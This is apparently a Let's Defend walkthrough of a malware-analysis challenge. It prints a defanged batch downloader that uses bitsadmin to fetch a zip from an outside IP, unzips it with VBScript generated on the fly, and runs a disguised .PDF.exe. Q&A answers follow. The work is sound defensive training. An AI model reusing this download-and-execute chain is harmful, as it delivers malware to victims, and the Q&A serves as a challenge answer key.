Back to Walkthroughs
Batch Downloader
Let's Defend Malware Analysis [Easy]Easy

Batch Downloader

#tutorial

Challenge Description

image

Solution and Analysis

Extract the batch file from the password protected archive, this is the defanged code

@echo off
REM -- The following line is the downloader component. The URL has been defanged. --
bitsadmin /transfer System /Download /Priority FOREGROUND hxxp://193[.]169[.]255[.]78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip

setlocal
cd /d %~dp0

REM -- Calls the subroutine to unpack the downloaded payload. --
Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"

cd /d "%TEMP%"

REM -- The following line executes the payload. It has been commented out to prevent execution. --
REM start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"

REM -- The following line is the self-deletion/cleanup mechanism. It has been commented out. --
REM del %~s0 /q

GOTO :EOF

:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing

REM -- The following line runs the VBScript to unzip the file. It has been commented out. --
REM cscript //nologo %vbs%

if exist %vbs% del /f /q %vbs%
GOTO :EOF

Static Analysis Q&A

  1. Question 1: What command is used to prevent the command echoing in the console?

    • Answer: @echo off
    • Explanation: This is a standard command at the beginning of a batch script used for stealth and cleanliness. echo off prevents subsequent commands from being printed to the console as they are executed. The @ symbol preceding it prevents the echo off command itself from being displayed. This ensures the script runs without revealing its actions to the user.

  2. Question 2: Which tool is used to download a file from a specified URL in the script?

    • Answer: bitsadmin
    • Explanation: The script uses bitsadmin.exe, the Background Intelligent Transfer Service command-line tool. This is a legitimate Windows utility that malware authors frequently abuse to download malicious payloads. Using built-in system tools like this is a "Living Off the Land" (LOLBin) technique, which helps the malware avoid detection as it's using a trusted Microsoft-signed executable.

  3. Question 3: What is the priority set for the download operation in the script?

    • Answer: FOREGROUND
    • Explanation: The /Priority FOREGROUND switch tells the BITS service to give the download job a high priority. This ensures the malicious file is downloaded as quickly as possible, minimizing the time between initial execution and payload delivery.

  4. Question 4: Which command is used to start localization of environment changes in the script?

    • Answer: setlocal
    • Explanation: The setlocal command creates a local scope for environment variables. Any changes made to the environment after this command (like changing the current directory with cd) will be discarded when the script ends. This is a way for the script to clean up after itself and not leave lasting changes in the user's command shell environment.

  5. Question 5: Which IP address is used by malicious code?

    • Answer: 193.169.255.78
    • Explanation: This IP address is the hardcoded location of the command and control (C2) or staging server. The script reaches out to this address via HTTP to download the next-stage payload, which is the ZIP archive.

  6. Question 6: What is the name of the subroutine called to extract the contents of the zip file?

    • Answer: unzipfile
    • Explanation: The line Call :UnZipFile invokes a subroutine defined later in the script with the label :UnZipFile. Batch script labels are case-insensitive, so unzipfile is the correct name. This modular approach keeps the unpacking logic separate from the main execution flow.

  7. Question 7: Which command attempts to start an executable file extracted from the zip file?

    • Answer: start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
    • Explanation: The start command is used to run a program or open a file. In this case, it executes the payload FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe that was just extracted from the ZIP archive. The filename is designed to be deceptive, using a .PDF.exe double extension to trick users into thinking it's a harmless document.

  8. Question 8: Which scripting language is used to extract the contents of the zip file?

    • Answer: VBScript
    • Explanation: The batch script does not contain a native unzip command. Instead, the :UnZipFile subroutine dynamically creates a VBScript file (_.vbs) by echoing text into it. This VBScript code uses the built-in Shell.Application COM object, which has the functionality to handle ZIP archives. The batch script then executes this temporary VBScript using cscript.exe to perform the extraction.